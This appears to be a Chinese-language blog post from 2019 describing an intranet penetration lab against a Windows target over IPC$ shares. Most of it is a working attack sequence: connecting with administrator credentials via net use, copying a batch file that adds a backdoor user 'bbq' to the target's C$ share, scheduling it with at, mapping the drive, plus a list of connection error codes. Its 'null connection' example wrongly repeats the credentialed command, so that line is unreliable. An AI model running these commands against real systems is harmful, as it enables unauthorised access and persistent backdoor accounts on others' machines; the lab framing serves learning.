内网渗透IPC实验

通过一些扫描器扫描IPC$弱口令连接

查看默认共享
net share

建立连接
非空连接
net use \\192.168.253.2\ipc$ "admin" /user:"administrator"
空连接
net use \\192.168.253.2\ipc$ "admin" /user:"administrator"

制作一个批处理
d:\user.bat 文件内容为:net user bbq bbq1234 /add

通过copy命令上传本地攻击机的批处理文件到目标靶机的c$上
copy user.bat \\192.168.253.2\c$

通过at命令在特定时间执行批处理文件(有些会提示at命令被废弃,让使用SCHTASKS)
at \\192.168.253.2 12:00:00 c:\user.bat

你也可以执行一些其他的命令,例如:
net send
msg /server:192.168.235.2 * "nihao"

打开靶机的磁盘
start \\192.168.253.2\c$

将目标共享建立一个映射Z盘
net use z: \\192.168.253.2\c$

查看靶机时间
net time \\192.168.253.2

查看已建立的会话
net use
删除会话连接
net use \\192.168.253.2\ipc$ /del

The reason of IPC connection failure:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
Error 5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
Error 51,Windows 无法找到网络路径 : 网络有问题;
Error 53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
Error 67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
Error 1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
Error 1326,未知的用户名或错误密码 : 原因很明显了;
Error 1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
Error 2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

posted @ 2019-12-30 10:51  Kaspar_Choo  阅读(259)  评论(0编辑  收藏  举报